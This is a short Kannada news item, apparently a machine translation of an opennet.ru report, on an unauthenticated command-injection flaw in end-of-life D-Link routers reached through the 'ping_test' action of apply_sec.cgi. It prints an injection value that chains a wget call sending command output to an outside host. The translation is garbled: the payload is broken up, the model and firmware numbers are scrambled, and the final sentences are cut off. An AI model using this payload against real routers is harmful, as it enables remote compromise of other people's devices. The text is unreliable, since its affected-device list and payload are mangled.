ಡಿ-ಲಿಂಕ್ ವೈರ್ಲೆಸ್ ರೂಟರ್ಗಳಲ್ಲಿ
ಕುತೂಹಲಕಾರಿಯಾಗಿ, ಫರ್ಮ್ವೇರ್ ಡೆವಲಪರ್ಗಳ ಪ್ರಕಾರ, "ping_test" ಕರೆಯನ್ನು ದೃಢೀಕರಣದ ನಂತರ ಮಾತ್ರ ಕಾರ್ಯಗತಗೊಳಿಸಬೇಕು, ಆದರೆ ವಾಸ್ತವದಲ್ಲಿ ಇದನ್ನು ವೆಬ್ ಇಂಟರ್ಫೇಸ್ಗೆ ಲಾಗ್ ಇನ್ ಮಾಡದೆಯೇ ಯಾವುದೇ ಸಂದರ್ಭದಲ್ಲಿ ಕರೆಯಲಾಗುತ್ತದೆ. ನಿರ್ದಿಷ್ಟವಾಗಿ, apply_sec.cgi ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಪ್ರವೇಶಿಸುವಾಗ ಮತ್ತು “action=ping_test” ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ಹಾದುಹೋಗುವಾಗ, ಸ್ಕ್ರಿಪ್ಟ್ ದೃಢೀಕರಣ ಪುಟಕ್ಕೆ ಮರುನಿರ್ದೇಶಿಸುತ್ತದೆ, ಆದರೆ ಅದೇ ಸಮಯದಲ್ಲಿ ping_test ಗೆ ಸಂಬಂಧಿಸಿದ ಕ್ರಿಯೆಯನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ. ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು, ping_test ನಲ್ಲಿಯೇ ಮತ್ತೊಂದು ದುರ್ಬಲತೆಯನ್ನು ಬಳಸಲಾಗಿದೆ, ಇದು ಪರೀಕ್ಷೆಗೆ ಕಳುಹಿಸಲಾದ IP ವಿಳಾಸದ ಸರಿಯಾದತೆಯನ್ನು ಸರಿಯಾಗಿ ಪರಿಶೀಲಿಸದೆಯೇ ಪಿಂಗ್ ಉಪಯುಕ್ತತೆಯನ್ನು ಕರೆಯುತ್ತದೆ. ಉದಾಹರಣೆಗೆ, wget ಯುಟಿಲಿಟಿಗೆ ಕರೆ ಮಾಡಲು ಮತ್ತು "echo 1234" ಆಜ್ಞೆಯ ಫಲಿತಾಂಶಗಳನ್ನು ಬಾಹ್ಯ ಹೋಸ್ಟ್ಗೆ ವರ್ಗಾಯಿಸಲು, "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಿ. test.test/?$( ಎಕೋ 1234)".
ಈ ಕೆಳಗಿನ ಮಾದರಿಗಳಲ್ಲಿ ದುರ್ಬಲತೆಯ ಉಪಸ್ಥಿತಿಯನ್ನು ಅಧಿಕೃತವಾಗಿ ದೃಢೀಕರಿಸಲಾಗಿದೆ:
- ಫರ್ಮ್ವೇರ್ 655b3.02 ಅಥವಾ ಹಳೆಯದರೊಂದಿಗೆ DIR-05;
- ಫರ್ಮ್ವೇರ್ 866b1.03 ಅಥವಾ ಅದಕ್ಕಿಂತ ಹೆಚ್ಚಿನದರೊಂದಿಗೆ DIR-04L;
- ಫರ್ಮ್ವೇರ್ 1565 ಅಥವಾ ಅದಕ್ಕಿಂತ ಹೆಚ್ಚಿನದರೊಂದಿಗೆ DIR-1.01;
- DIR-652 (ಸಮಸ್ಯೆಯ ಫರ್ಮ್ವೇರ್ ಆವೃತ್ತಿಗಳ ಡೇಟಾವನ್ನು ಒದಗಿಸಲಾಗಿಲ್ಲ)
ಈ ಮಾದರಿಗಳಿಗೆ ಬೆಂಬಲ ಅವಧಿಯು ಈಗಾಗಲೇ ಮುಕ್ತಾಯಗೊಂಡಿದೆ, ಆದ್ದರಿಂದ ಡಿ-ಲಿಂಕ್
ದುರ್ಬಲತೆಯೂ ಆಗಿರುವುದು ನಂತರ ಪತ್ತೆಯಾಯಿತು
ಮೂಲ: opennet.ru